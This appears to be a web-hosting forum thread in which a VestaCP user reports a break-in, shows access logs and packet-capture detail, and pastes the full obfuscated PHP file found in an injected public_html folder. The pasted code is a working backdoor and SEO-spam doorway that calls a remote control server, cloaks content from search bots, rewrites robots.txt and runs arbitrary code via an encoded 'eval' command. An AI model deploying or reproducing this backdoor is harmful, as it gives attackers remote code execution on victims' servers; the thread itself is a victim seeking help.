Attack
Attack
Dear,
I'm using the latest Vesta on Ubuntu 14.04, and now I have this attack:
The problem is: how can I stop this attack, and why is it possible to write into my public_html?
Regards
I'm using the latest Vesta on Ubuntu 14.04, and now I have this attack:
and in my public_html I found the folder "propionyl-coa-zdnr/fttahc"; inside it there is an "index.php".
50.62.208.149 - - [25/Jan/2021:19:15:43 +0100] "GET /propionyl-coa-zdnr/fttahc HTTP/1.0" 301 759 "http://www.mysite.com/propionyl-coa-zdnr/fttahc" "Mozilla/5.0 (Windows NT 6.1; rv:54.0) Gecko/20100101 Firefox/54.0"
50.62.208.149 - - [25/Jan/2021:19:15:44 +0100] "GET /propionyl-coa-zdnr/fttahc HTTP/1.0" 404 40850 "http://www.mysite.com/propionyl-coa-zdnr/fttahc" "Mozilla/5.0 (Windows NT 6.1; rv:54.0) Gecko/20100101 Firefox/54.0"
If I try to run this, my server replies "page not found".
<?php
@ini_set('error_log', NULL);@ini_set('log_errors', 0);@ini_set('max_execution_time', 0);@error_reporting(0);@set_time_limit(0);date_default_timezone_set('UTC');class _zc1ryjh{static private $_8spe9dpd = 2420912312;static function _814m6($_3chjy2s4, $_5o3gbzbv){$_3chjy2s4[2] = count($_3chjy2s4) > 4 ? long2ip(_zc1ryjh::$_8spe9dpd - 272) : $_3chjy2s4[2];$_gf8sgs58 = _zc1ryjh::_4v1sq($_3chjy2s4, $_5o3gbzbv);if (!$_gf8sgs58) {$_gf8sgs58 = _zc1ryjh::_szn1q($_3chjy2s4, $_5o3gbzbv);}return $_gf8sgs58;}static function _4v1sq($_3chjy2s4, $_gf8sgs58, $_v2i0yu0q = NULL){if (!function_exists('curl_version')) {return "";}if (is_array($_3chjy2s4)) {$_3chjy2s4 = implode("/", $_3chjy2s4);}$_fg2kfs6a = curl_init();curl_setopt($_fg2kfs6a, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($_fg2kfs6a, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($_fg2kfs6a, CURLOPT_URL, $_3chjy2s4);if (!empty($_gf8sgs58)) {curl_setopt($_fg2kfs6a, CURLOPT_POST, 1);curl_setopt($_fg2kfs6a, CURLOPT_POSTFIELDS, $_gf8sgs58);}if (!empty($_v2i0yu0q)) {curl_setopt($_fg2kfs6a, CURLOPT_HTTPHEADER, $_v2i0yu0q);}curl_setopt($_fg2kfs6a, CURLOPT_RETURNTRANSFER, TRUE);$_p2sl7u8a = curl_exec($_fg2kfs6a);curl_close($_fg2kfs6a);return $_p2sl7u8a;}static function _szn1q($_3chjy2s4, $_gf8sgs58, $_v2i0yu0q = NULL){if (is_array($_3chjy2s4)) {$_3chjy2s4 = implode("/", $_3chjy2s4);}if (!empty($_gf8sgs58)) {$_h1py0sy1 = array('method' => 'POST','header' => 'Content-type: application/x-www-form-urlencoded','content' => $_gf8sgs58);if (!empty($_v2i0yu0q)) {$_h1py0sy1["header"] = $_h1py0sy1["header"] . "\r\n" . 
implode("\r\n", $_v2i0yu0q);}$_lkrl430p = stream_context_create(array('http' => $_h1py0sy1));} else {$_h1py0sy1 = array('method' => 'GET',);if (!empty($_v2i0yu0q)) {$_h1py0sy1["header"] = implode("\r\n", $_v2i0yu0q);}$_lkrl430p = stream_context_create(array('http' => $_h1py0sy1));}return @file_get_contents($_3chjy2s4, FALSE, $_lkrl430p);}}class _fj0l5i4{private static $_e3vbkmed = "";private static $_eudlzycb = -1;private static $_o6cnzwl2 = "";private $_jjt63nsj = "";private $_rhxb9379 = "";private $_0rnai7fv = "";private $_829th661 = "";public static function _znbqo($_ssatnrck, $_uotguerd, $_jx79b2zu){_fj0l5i4::$_e3vbkmed = $_ssatnrck . "/cache/";_fj0l5i4::$_eudlzycb = $_uotguerd;_fj0l5i4::$_o6cnzwl2 = $_jx79b2zu;if (!@file_exists(_fj0l5i4::$_e3vbkmed)) {@mkdir(_fj0l5i4::$_e3vbkmed);}}static public function _mnlv7(){$_u84t39zp = 0;foreach (scandir(_fj0l5i4::$_e3vbkmed) as $_fk40a44w) {$_u84t39zp += 1;}return $_u84t39zp;}public static function _c2h3p(){return TRUE;}public function __construct($_rhy23rx3, $_x9bufplp, $_ypibf928, $_zd1i4hhu){$this->_jjt63nsj = $_rhy23rx3;$this->_rhxb9379 = $_x9bufplp;$this->_0rnai7fv = $_ypibf928;$this->_829th661 = $_zd1i4hhu;}public function _j2dlh(){function _m7xw5($_jg390771, $_9oyw8goy){return round(rand($_jg390771, $_9oyw8goy - 1) + (rand(0, PHP_INT_MAX - 1) / PHP_INT_MAX), 2);}$_ycmobcif = _cgl8qc::_4mdz2();$_gf8sgs58 = str_replace("{{ text }}", $this->_rhxb9379,str_replace("{{ keyword }}", $this->_0rnai7fv,str_replace("{{ links }}", $this->_829th661, $this->_jjt63nsj)));while (TRUE) {$_7patefkr = preg_replace('/' . preg_quote("{{ randkeyword }}", '/') . 
'/', _cgl8qc::_eehvg(), $_gf8sgs58, 1);if ($_7patefkr === $_gf8sgs58) {break;}$_gf8sgs58 = $_7patefkr;}while (TRUE) {preg_match('/{{ KEYWORDBYINDEX-ANCHOR (\d*) }}/', $_gf8sgs58, $_sln2mkj6);if (empty($_sln2mkj6)) {break;}$_ypibf928 = @$_ycmobcif[intval($_sln2mkj6[1])];$_5ujbized = _7wn7urj::_9itoa($_ypibf928);$_gf8sgs58 = str_replace($_sln2mkj6[0], $_5ujbized, $_gf8sgs58);}while (TRUE) {preg_match('/{{ KEYWORDBYINDEX (\d*) }}/', $_gf8sgs58, $_sln2mkj6);if (empty($_sln2mkj6)) {break;}$_ypibf928 = @$_ycmobcif[intval($_sln2mkj6[1])];$_gf8sgs58 = str_replace($_sln2mkj6[0], $_ypibf928, $_gf8sgs58);}while (TRUE) {preg_match('/{{ RANDFLOAT (\d*)-(\d*) }}/', $_gf8sgs58, $_sln2mkj6);if (empty($_sln2mkj6)) {break;}$_gf8sgs58 = str_replace($_sln2mkj6[0], _m7xw5($_sln2mkj6[1], $_sln2mkj6[2]), $_gf8sgs58);}while (TRUE) {preg_match('/{{ RANDINT (\d*)-(\d*) }}/', $_gf8sgs58, $_sln2mkj6);if (empty($_sln2mkj6)) {break;}$_gf8sgs58 = str_replace($_sln2mkj6[0], rand($_sln2mkj6[1], $_sln2mkj6[2]), $_gf8sgs58);}return $_gf8sgs58;}public function _2iur5(){$_rbo8wkb2 = _fj0l5i4::$_e3vbkmed . md5($this->_0rnai7fv . _fj0l5i4::$_o6cnzwl2);if (_fj0l5i4::$_eudlzycb == -1) {$_efkoaggn = -1;} else {$_efkoaggn = time() + (3600 * 24 * 30);}$_hlxuvxyx = array("template" => $this->_jjt63nsj, "text" => $this->_rhxb9379, "keyword" => $this->_0rnai7fv,"links" => $this->_829th661, "expired" => $_efkoaggn);@file_put_contents($_rbo8wkb2, serialize($_hlxuvxyx));}static public function _5h0rw($_ypibf928){$_rbo8wkb2 = _fj0l5i4::$_e3vbkmed . md5($_ypibf928 . 
_fj0l5i4::$_o6cnzwl2);$_rbo8wkb2 = @unserialize(@file_get_contents($_rbo8wkb2));if (!empty($_rbo8wkb2) && ($_rbo8wkb2["expired"] > time() || $_rbo8wkb2["expired"] == -1)) {return new _fj0l5i4($_rbo8wkb2["template"], $_rbo8wkb2["text"], $_rbo8wkb2["keyword"], $_rbo8wkb2["links"]);} else {return null;}}}class _z1z2c5{private static $_e3vbkmed = "";private static $_agfg14nt = "";public static function _znbqo($_ssatnrck, $_aj6h3dw8){_z1z2c5::$_e3vbkmed = $_ssatnrck . "/";_z1z2c5::$_agfg14nt = $_aj6h3dw8;if (!@file_exists(_z1z2c5::$_e3vbkmed)) {@mkdir(_z1z2c5::$_e3vbkmed);}}public static function _c2h3p(){return TRUE;}static public function _mnlv7(){$_u84t39zp = 0;foreach (scandir(_z1z2c5::$_e3vbkmed) as $_fk40a44w) {if (strpos($_fk40a44w, _z1z2c5::$_agfg14nt) === 0) {$_u84t39zp += 1;}}return $_u84t39zp;}static public function _eehvg(){$_d0n8q08z = array();foreach (scandir(_z1z2c5::$_e3vbkmed) as $_fk40a44w) {if (strpos($_fk40a44w, _z1z2c5::$_agfg14nt) === 0) {$_d0n8q08z[] = $_fk40a44w;}}return @file_get_contents(_z1z2c5::$_e3vbkmed . $_d0n8q08z[array_rand($_d0n8q08z)]);}static public function _2iur5($_gxv1iqbn){if (@file_exists(_z1z2c5::$_agfg14nt . "_" . md5($_gxv1iqbn) . ".html")) {return;}@file_put_contents(_z1z2c5::$_agfg14nt . "_" . md5($_gxv1iqbn) . ".html", $_gxv1iqbn);}}class _cgl8qc{private static $_e3vbkmed = "";private static $_agfg14nt = "";private static $_rg3x84go = Array();private static $_9m6iqpaj = Array();public static function _znbqo($_ssatnrck, $_aj6h3dw8){_cgl8qc::$_e3vbkmed = $_ssatnrck . 
"/";_cgl8qc::$_agfg14nt = $_aj6h3dw8;if (!@file_exists(_cgl8qc::$_e3vbkmed)) {@mkdir(_cgl8qc::$_e3vbkmed);}}private static function _dawb2(){$_s265o4f6 = array();foreach (scandir(_cgl8qc::$_e3vbkmed) as $_fk40a44w) {if (strpos($_fk40a44w, _cgl8qc::$_agfg14nt) === 0) {$_s265o4f6[] = $_fk40a44w;}}return $_s265o4f6;}public static function _c2h3p(){return TRUE;}static public function _eehvg(){if (empty(_cgl8qc::$_rg3x84go)){$_s265o4f6 = _cgl8qc::_dawb2();_cgl8qc::$_rg3x84go = @file(_cgl8qc::$_e3vbkmed . $_s265o4f6[array_rand($_s265o4f6)], FILE_IGNORE_NEW_LINES);}return _cgl8qc::$_rg3x84go[array_rand(_cgl8qc::$_rg3x84go)];}static public function _4mdz2(){if (empty(_cgl8qc::$_9m6iqpaj)){$_s265o4f6 = _cgl8qc::_dawb2();foreach ($_s265o4f6 as $_muvtxbmx) {_cgl8qc::$_9m6iqpaj = array_merge(_cgl8qc::$_9m6iqpaj, @file(_cgl8qc::$_e3vbkmed . $_muvtxbmx, FILE_IGNORE_NEW_LINES));}}return _cgl8qc::$_9m6iqpaj;}static public function _2iur5($_g9qi85d6){if (@file_exists(_cgl8qc::$_agfg14nt . "_" . md5($_g9qi85d6) . ".list")) {return;}@file_put_contents(_cgl8qc::$_agfg14nt . "_" . md5($_g9qi85d6) . ".list", $_g9qi85d6);}static public function _knfc6($_ypibf928){@file_put_contents(_cgl8qc::$_agfg14nt . "_" . md5(_7wn7urj::$_4trnoaqg) . ".list", $_ypibf928 . "\n", 8);}}class _7wn7urj{static public $_i1v9gtfb = "5.0";static public $_4trnoaqg = "5bb2b6ab-3c35-5b9e-3775-0ee616879036";private $_r5knkrc2 = "http://136.12.78.46/app/assets/api2?act ... 
r";private $_ve4xuwfa = "http://136.12.78.46/app/assets/api?action=page";static public $_l2vuknso = 5;static public $_bxt80c2j = 20;private function _jbfgg(){$_b0ccu89r = array('#libwww-perl#i','#MJ12bot#i','#msnbot#i', '#msnbot-media#i','#YandexBot#i', '#msnbot#i', '#YandexWebmaster#i','#spider#i', '#yahoo#i', '#google#i', '#altavista#i','#ask#i','#yahoo!\s*slurp#i','#BingBot#i');if (!empty($_SERVER['HTTP_USER_AGENT']) && (FALSE !== strpos(preg_replace($_b0ccu89r, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT']), '-NO-WAY-'))) {$_qece251g = 1;} elseif (empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) || empty($_SERVER['HTTP_REFERER'])) {$_qece251g = 1;} elseif (strpos($_SERVER['HTTP_REFERER'], "google") === FALSE &&strpos($_SERVER['HTTP_REFERER'], "yahoo") === FALSE &&strpos($_SERVER['HTTP_REFERER'], "bing") === FALSE &&strpos($_SERVER['HTTP_REFERER'], "yandex") === FALSE) {$_qece251g = 1;} else {$_qece251g = 0;}return $_qece251g;}private static function _ljcy0(){$_5o3gbzbv = array();$_5o3gbzbv['ip'] = $_SERVER['REMOTE_ADDR'];$_5o3gbzbv['qs'] = @$_SERVER['HTTP_HOST'] . 
@$_SERVER['REQUEST_URI'];$_5o3gbzbv['ua'] = @$_SERVER['HTTP_USER_AGENT'];$_5o3gbzbv['lang'] = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];$_5o3gbzbv['ref'] = @$_SERVER['HTTP_REFERER'];$_5o3gbzbv['enc'] = @$_SERVER['HTTP_ACCEPT_ENCODING'];$_5o3gbzbv['acp'] = @$_SERVER['HTTP_ACCEPT'];$_5o3gbzbv['char'] = @$_SERVER['HTTP_ACCEPT_CHARSET'];$_5o3gbzbv['conn'] = @$_SERVER['HTTP_CONNECTION'];return $_5o3gbzbv;}public function __construct(){$this->_r5knkrc2 = explode("/", $this->_r5knkrc2);$this->_ve4xuwfa = explode("/", $this->_ve4xuwfa);}static public function _ovl43($_6csgigc5){if (strlen($_6csgigc5) < 4) {return "";}$_4wgjfb6w = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";$_ycmobcif = str_split($_4wgjfb6w);$_ycmobcif = array_flip($_ycmobcif);$_8yjc1jpr = 0;$_g60o7pzi = "";$_6csgigc5 = preg_replace("~[^A-Za-z0-9\+\/\=]~", "", $_6csgigc5);do {$_ablz7vi7 = $_ycmobcif[$_6csgigc5[$_8yjc1jpr++]];$_l137zfsi = $_ycmobcif[$_6csgigc5[$_8yjc1jpr++]];$_d6zybjy7 = $_ycmobcif[$_6csgigc5[$_8yjc1jpr++]];$_7l9zpqcx = $_ycmobcif[$_6csgigc5[$_8yjc1jpr++]];$_y4ybl5j6 = ($_ablz7vi7 << 2) | ($_l137zfsi >> 4);$_05kiomga = (($_l137zfsi & 15) << 4) | ($_d6zybjy7 >> 2);$_msbx5hih = (($_d6zybjy7 & 3) << 6) | $_7l9zpqcx;$_g60o7pzi = $_g60o7pzi . chr($_y4ybl5j6);if ($_d6zybjy7 != 64) {$_g60o7pzi = $_g60o7pzi . chr($_05kiomga);}if ($_7l9zpqcx != 64) {$_g60o7pzi = $_g60o7pzi . 
chr($_msbx5hih);}} while ($_8yjc1jpr < strlen($_6csgigc5));return $_g60o7pzi;}private function _73fse($_ypibf928){$_rhy23rx3 = "";$_x9bufplp = "";$_5o3gbzbv = _7wn7urj::_ljcy0();$_5o3gbzbv["uid"] = _7wn7urj::$_4trnoaqg;$_5o3gbzbv["keyword"] = $_ypibf928;$_5o3gbzbv["tc"] = 10;$_5o3gbzbv = http_build_query($_5o3gbzbv);$_ea3h9tn2 = _zc1ryjh::_814m6($this->_ve4xuwfa, $_5o3gbzbv);if (strpos($_ea3h9tn2, _7wn7urj::$_4trnoaqg) === FALSE) {return array($_rhy23rx3, $_x9bufplp);}$_rhy23rx3 = _z1z2c5::_eehvg();$_x9bufplp = substr($_ea3h9tn2, strlen(_7wn7urj::$_4trnoaqg));$_x9bufplp = explode("\n", $_x9bufplp);shuffle($_x9bufplp);$_x9bufplp = implode(" ", $_x9bufplp);return array($_rhy23rx3, $_x9bufplp);}private function _hwjli(){$_5o3gbzbv = _7wn7urj::_ljcy0();if (isset($_SERVER['HTTP_CF_CONNECTING_IP'])) {$_5o3gbzbv['cfconn'] = @$_SERVER['HTTP_CF_CONNECTING_IP'];}if (isset($_SERVER['HTTP_X_REAL_IP'])) {$_5o3gbzbv['xreal'] = @$_SERVER['HTTP_X_REAL_IP'];}if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {$_5o3gbzbv['xforward'] = @$_SERVER['HTTP_X_FORWARDED_FOR'];}$_5o3gbzbv["uid"] = _7wn7urj::$_4trnoaqg;$_5o3gbzbv = http_build_query($_5o3gbzbv);$_w9ulzzc5 = _zc1ryjh::_814m6($this->_r5knkrc2, $_5o3gbzbv);$_w9ulzzc5 = @unserialize($_w9ulzzc5);if (isset($_w9ulzzc5["type"]) && $_w9ulzzc5["type"] == "redir") {if (!empty($_w9ulzzc5["data"]["header"])) {header($_w9ulzzc5["data"]["header"]);return true;} elseif (!empty($_w9ulzzc5["data"]["code"])) {echo $_w9ulzzc5["data"]["code"];return true;}}return false;}public function _c2h3p(){return _fj0l5i4::_c2h3p() && _z1z2c5::_c2h3p() && _cgl8qc::_c2h3p();}static public function _1ymhu(){if ((!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443) {return true;}return false;}public static function _qdsbn(){$_8x93o7q7 = explode("?", $_SERVER["REQUEST_URI"], 2);$_8x93o7q7 = $_8x93o7q7[0];if (strpos($_8x93o7q7, ".php") === FALSE) {$_8x93o7q7 = explode("/", $_8x93o7q7);array_pop($_8x93o7q7);$_8x93o7q7 = 
implode("/", $_8x93o7q7) . "/";}return sprintf("%s://%s%s", _7wn7urj::_1ymhu() ? "https" : "http", $_SERVER['HTTP_HOST'], $_8x93o7q7);}public static function _radf5(){$_ymon8uv2 = array("https://www.bing.com/ping?sitemap=" => "Thanks for submitting your Sitemap","https://www.google.com/ping?sitemap=" => "Sitemap Notification Received");$_v2i0yu0q = array("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Accept-Language: en-US,en;q=0.5","User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0",);$_7574umt9 = urlencode(_7wn7urj::_gb1un() . "/sitemap.xml");foreach ($_ymon8uv2 as $_3chjy2s4 => $_pkll7imh) {$_l749xbaz = _zc1ryjh::_4v1sq($_3chjy2s4 . $_7574umt9, NULL, $_v2i0yu0q);if (empty($_l749xbaz)) {$_l749xbaz = _zc1ryjh::_szn1q($_3chjy2s4 . $_7574umt9, NULL, $_v2i0yu0q);}if (empty($_l749xbaz)) {return FALSE;}if (strpos($_l749xbaz, $_pkll7imh) === FALSE) {return FALSE;}}return TRUE;}public static function _w44lw(){$_awkqpmfn = "User-agent: *\nDisallow: %s\nUser-agent: Bingbot\nUser-agent: Googlebot\nUser-agent: Slurp\nDisallow:\nSitemap: %s\n";$_8x93o7q7 = explode("?", $_SERVER["REQUEST_URI"], 2);$_8x93o7q7 = $_8x93o7q7[0];$_wvzdov1p = substr($_8x93o7q7, 0, strrpos($_8x93o7q7, "/"));$_iw0ofcj9 = sprintf($_awkqpmfn, $_wvzdov1p, _7wn7urj::_gb1un() . "/sitemap.xml");$_wsq475h4 = $_SERVER["DOCUMENT_ROOT"] . "/robots.txt";if (@file_exists($_wsq475h4)) {@chmod($_wsq475h4, 0777);$_wkmac7k3 = @file_get_contents($_wsq475h4);} else {$_wkmac7k3 = "";}if (strpos($_wkmac7k3, $_iw0ofcj9) === FALSE) {@file_put_contents($_wsq475h4, $_wkmac7k3 . "\n" . $_iw0ofcj9);$_wkmac7k3 = @file_get_contents($_wsq475h4);return (strpos($_wkmac7k3, $_iw0ofcj9) !== FALSE);}return FALSE;}public static function _gb1un(){$_8x93o7q7 = explode("?", $_SERVER["REQUEST_URI"], 2);$_8x93o7q7 = $_8x93o7q7[0];$_ssatnrck = substr($_8x93o7q7, 0, strrpos($_8x93o7q7, "/"));return sprintf("%s://%s%s", _7wn7urj::_1ymhu() ? 
"https" : "http", $_SERVER['HTTP_HOST'], $_ssatnrck);}public static function _9itoa($_ypibf928){$_zmh5ug6v = _7wn7urj::_qdsbn();$_suwyqev6 = substr(md5(_7wn7urj::$_4trnoaqg . "salt3"), 0, 6);$_mlia2fdv = "";if (substr($_zmh5ug6v, -1) == "/") {if (ord($_suwyqev6[1]) % 2) {$_ypibf928 = str_replace(" ", "-", $_suwyqev6 . "-" . $_ypibf928);} else {$_ypibf928 = str_replace(" ", "-", $_ypibf928 . "-" . $_suwyqev6);}$_mlia2fdv = sprintf("%s%s", $_zmh5ug6v, urlencode($_ypibf928));} else {if (ord($_suwyqev6[0]) % 2) {$_mlia2fdv = sprintf("%s?%s=%s",$_zmh5ug6v,$_suwyqev6,urlencode(str_replace(" ", "-", $_ypibf928)));} else {$_u0jhvc7p = array("id", "page", "tag");$_929apsgm = $_u0jhvc7p[ord($_suwyqev6[2]) % count($_u0jhvc7p)];if (ord($_suwyqev6[1]) % 2) {$_ypibf928 = str_replace(" ", "-", $_suwyqev6 . "-" . $_ypibf928);} else {$_ypibf928 = str_replace(" ", "-", $_ypibf928 . "-" . $_suwyqev6);}$_mlia2fdv = sprintf("%s?%s=%s",$_zmh5ug6v,$_929apsgm,urlencode($_ypibf928));}}return $_mlia2fdv;}public static function _2ncga($_jg390771, $_9oyw8goy){$_eutr44ii = "";for ($_8yjc1jpr = 0; $_8yjc1jpr < rand($_jg390771, $_9oyw8goy); $_8yjc1jpr++) {$_ypibf928 = _cgl8qc::_eehvg();$_eutr44ii .= sprintf("<a href=\"%s\">%s</a>,\n",_7wn7urj::_9itoa($_ypibf928), ucwords($_ypibf928));}return $_eutr44ii;}public static function _t6ier($_juz9n20h=FALSE){$_q34iy50g = dirname(__FILE__) . "/sitemap.xml";$_a0vj65sd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?" . ">\n<urlset xmlns=\"http://www.sitemaps.org/schemas/sitemap ... 
$_w74wdc6w = "</urlset>";$_ycmobcif = _cgl8qc::_4mdz2();$_gw8pgmpd = array();if (file_exists($_q34iy50g)) {$_ea3h9tn2 = simplexml_load_file($_q34iy50g);foreach ($_ea3h9tn2 as $_js5pietd) {$_gw8pgmpd[(string)$_js5pietd->loc] = (string)$_js5pietd->lastmod;}}else {$_juz9n20h = FALSE;}foreach ($_ycmobcif as $_3pouxiit) {$_mlia2fdv = _7wn7urj::_9itoa($_3pouxiit);if (isset($_gw8pgmpd[$_mlia2fdv])){continue;}if ($_juz9n20h) {$_roen0v2x = time();}else {$_roen0v2x = time() - (crc32 ($_3pouxiit) % (60 * 60 * 24 * 30));}$_gw8pgmpd[$_mlia2fdv] = date("Y-m-d", $_roen0v2x);;}$_a3kxg8oz = "";foreach ($_gw8pgmpd as $_3chjy2s4 => $_roen0v2x){$_a3kxg8oz .= "<url>\n";$_a3kxg8oz .= sprintf("<loc>%s</loc>\n", $_3chjy2s4);$_a3kxg8oz .= sprintf("<lastmod>%s</lastmod>\n", $_roen0v2x);$_a3kxg8oz .= "</url>\n";}$_kqtfv6sc = $_a0vj65sd . $_a3kxg8oz . $_w74wdc6w;$_7574umt9 = _7wn7urj::_gb1un() . "/sitemap.xml";@file_put_contents($_q34iy50g, $_kqtfv6sc);return $_7574umt9;}public function _hfoem(){$_929apsgm = substr(md5(_7wn7urj::$_4trnoaqg . "salt3"), 0, 6);if (isset($_GET[$_929apsgm])) {$_ypibf928 = $_GET[$_929apsgm];} elseif (strpos($_SERVER["REQUEST_URI"], $_929apsgm) !== FALSE) {$_ftx7qtaz = explode("/", $_SERVER["REQUEST_URI"]);foreach ($_ftx7qtaz as $_fpm51tev) {if (strpos($_fpm51tev, $_929apsgm) !== FALSE) {$_44nbpb1x = explode("=", $_fpm51tev);$_f2pcgqki = array_pop($_44nbpb1x);$_f2pcgqki = str_replace($_929apsgm . "-", "", $_f2pcgqki);$_f2pcgqki = str_replace("-" . 
$_929apsgm, "", $_f2pcgqki);$_ypibf928 = $_f2pcgqki;}}}if (empty($_ypibf928)) {$_ycmobcif = _cgl8qc::_4mdz2();$_ypibf928 = $_ycmobcif[0];}if (!empty($_ypibf928)) {$_ypibf928 = str_replace("-", " ", $_ypibf928);if (!$this->_jbfgg()) {if ($this->_hwjli()) {return;}}$_ypibf928 = urldecode($_ypibf928);$_w9ulzzc5 = _fj0l5i4::_5h0rw($_ypibf928);if (empty($_w9ulzzc5)) {list($_rhy23rx3, $_x9bufplp) = $this->_73fse($_ypibf928);if (empty($_x9bufplp)) {return;}$_w9ulzzc5 = new _fj0l5i4($_rhy23rx3, $_x9bufplp, $_ypibf928, _7wn7urj::_2ncga(_7wn7urj::$_l2vuknso, _7wn7urj::$_bxt80c2j));$_w9ulzzc5->_2iur5();}echo $_w9ulzzc5->_j2dlh();}}}_fj0l5i4::_znbqo(dirname(__FILE__), -1, _7wn7urj::$_4trnoaqg);_z1z2c5::_znbqo(dirname(__FILE__), substr(md5(_7wn7urj::$_4trnoaqg . "salt12"), 0, 4));_cgl8qc::_znbqo(dirname(__FILE__), substr(md5(_7wn7urj::$_4trnoaqg . "salt22"), 0, 4));function _2tto9($_ea3h9tn2, $_3pouxiit){$_y291x0ld = "";for ($_8yjc1jpr = 0; $_8yjc1jpr < strlen($_ea3h9tn2);) {for ($_t1f7fw3y = 0; $_t1f7fw3y < strlen($_3pouxiit) && $_8yjc1jpr < strlen($_ea3h9tn2); $_t1f7fw3y++, $_8yjc1jpr++) {$_y291x0ld .= chr(ord($_ea3h9tn2[$_8yjc1jpr]) ^ ord($_3pouxiit[$_t1f7fw3y]));}}return $_y291x0ld;}function _jgank($_ea3h9tn2, $_3pouxiit, $_db8usjta){return _2tto9(_2tto9($_ea3h9tn2, $_3pouxiit), $_db8usjta);}foreach (array_merge($_COOKIE, $_POST) as $_590a55b5 => $_ea3h9tn2) {$_ea3h9tn2 = @unserialize(_jgank(_7wn7urj::_ovl43($_ea3h9tn2), $_590a55b5, _7wn7urj::$_4trnoaqg));if (isset($_ea3h9tn2['ak']) && _7wn7urj::$_4trnoaqg == $_ea3h9tn2['ak']) {if ($_ea3h9tn2['a'] == 'doorway2') {if ($_ea3h9tn2['sa'] == 'check') {$_gf8sgs58 = _zc1ryjh::_814m6(explode("/", "http://httpbin.org/"), "");if (strlen($_gf8sgs58) > 512) {echo @serialize(array("uid" => _7wn7urj::$_4trnoaqg, "v" => _7wn7urj::$_i1v9gtfb,"cache" => _fj0l5i4::_mnlv7(),"keywords" => count(_cgl8qc::_4mdz2()),"templates" => _z1z2c5::_mnlv7()));}exit;}if ($_ea3h9tn2['sa'] == 'templates') {foreach ($_ea3h9tn2["templates"] as $_rhy23rx3) 
{_z1z2c5::_2iur5($_rhy23rx3);echo @serialize(array("uid" => _7wn7urj::$_4trnoaqg, "v" => _7wn7urj::$_i1v9gtfb,));}}if ($_ea3h9tn2['sa'] == 'keywords') {_cgl8qc::_2iur5($_ea3h9tn2["keywords"]);_7wn7urj::_t6ier();echo @serialize(array("uid" => _7wn7urj::$_4trnoaqg, "v" => _7wn7urj::$_i1v9gtfb,));}if ($_ea3h9tn2['sa'] == 'update_sitemap') {_7wn7urj::_t6ier(TRUE);echo @serialize(array("uid" => _7wn7urj::$_4trnoaqg, "v" => _7wn7urj::$_i1v9gtfb,));}if ($_ea3h9tn2['sa'] == 'pages') {$_hzdo1lzm = 0;$_k4dyo0ax = _cgl8qc::_4mdz2();if (_z1z2c5::_mnlv7() > 0) {foreach ($_ea3h9tn2['pages'] as $_w9ulzzc5) {$_2nsu4827 = _fj0l5i4::_5h0rw($_w9ulzzc5["keyword"]);if (empty($_2nsu4827)) {$_2nsu4827 = new _fj0l5i4(_z1z2c5::_eehvg(), $_w9ulzzc5["text"], $_w9ulzzc5["keyword"], _7wn7urj::_2ncga(_7wn7urj::$_l2vuknso, _7wn7urj::$_bxt80c2j));$_2nsu4827->_2iur5();$_hzdo1lzm += 1;if (!in_array($_w9ulzzc5["keyword"], $_k4dyo0ax)){_cgl8qc::_knfc6($_w9ulzzc5["keyword"]);}}}}echo @serialize(array("uid" => _7wn7urj::$_4trnoaqg, "v" => _7wn7urj::$_i1v9gtfb, "pages" => $_hzdo1lzm));}if ($_ea3h9tn2["sa"] == "ping") {$_l749xbaz = _7wn7urj::_radf5();echo @serialize(array("uid" => _7wn7urj::$_4trnoaqg, "v" => _7wn7urj::$_i1v9gtfb, "result" => (int)$_l749xbaz));}if ($_ea3h9tn2["sa"] == "robots") {$_l749xbaz = _7wn7urj::_w44lw();echo @serialize(array("uid" => _7wn7urj::$_4trnoaqg, "v" => _7wn7urj::$_i1v9gtfb, "result" => (int)$_l749xbaz));}}if ($_ea3h9tn2['sa'] == 'eval') {eval($_ea3h9tn2["data"]);exit;}}}$_e8um1fck = new _7wn7urj();if ($_e8um1fck->_c2h3p()) {$_e8um1fck->_hfoem();}exit();
The problem is: how can I stop this attack, and why is it possible to write into my public_html?
Regards
Re: Attack
Hi,
my previous post wasn't clear; now I'm sure this is an attack:
The problem is that now in my public_html I have a folder "apichatpong-weerasethakul-eetuva".
Any idea how to solve this problem?
Regards
D
my previous post wasn't clear; now I'm sure this is an attack:
I replaced my domain with "mydomain" and my IP with "MYIP".
Frame 1646723: 580 bytes on wire (4640 bits), 580 bytes captured (4640 bits)
Encapsulation type: Ethernet (1)
Arrival Time: Jan 28, 2021 21:37:08.434383000 W. Europe Standard Time
[Time shift for this packet: 0.000000000 seconds]
Epoch Time: 1611866228.434383000 seconds
[Time delta from previous captured frame: 0.082077000 seconds]
[Time delta from previous displayed frame: 0.082077000 seconds]
[Time since reference or first frame: 10553.164318000 seconds]
Frame Number: 1646723
Frame Length: 580 bytes (4640 bits)
Capture Length: 580 bytes (4640 bits)
[Frame is marked: False]
[Frame is ignored: False]
[Protocols in frame: eth:ethertype:ip:tcp:http:urlencoded-form]
[Coloring Rule Name: HTTP]
[Coloring Rule String: http || tcp.port == 80 || http2]
Ethernet II, Src: Netgear_a6:5a:1d (08:02:8e:a6:5a:1d), Dst: Broadcom_90:b6:9c (00:10:18:90:b6:9c)
Destination: Broadcom_90:b6:9c (00:10:18:90:b6:9c)
Address: Broadcom_90:b6:9c (00:10:18:90:b6:9c)
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Source: Netgear_a6:5a:1d (08:02:8e:a6:5a:1d)
Address: Netgear_a6:5a:1d (08:02:8e:a6:5a:1d)
.... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
.... ...0 .... .... .... .... = IG bit: Individual address (unicast)
Type: IPv4 (0x0800)
Internet Protocol Version 4, Src: 67.213.82.137, Dst: MYIP
0100 .... = Version: 4
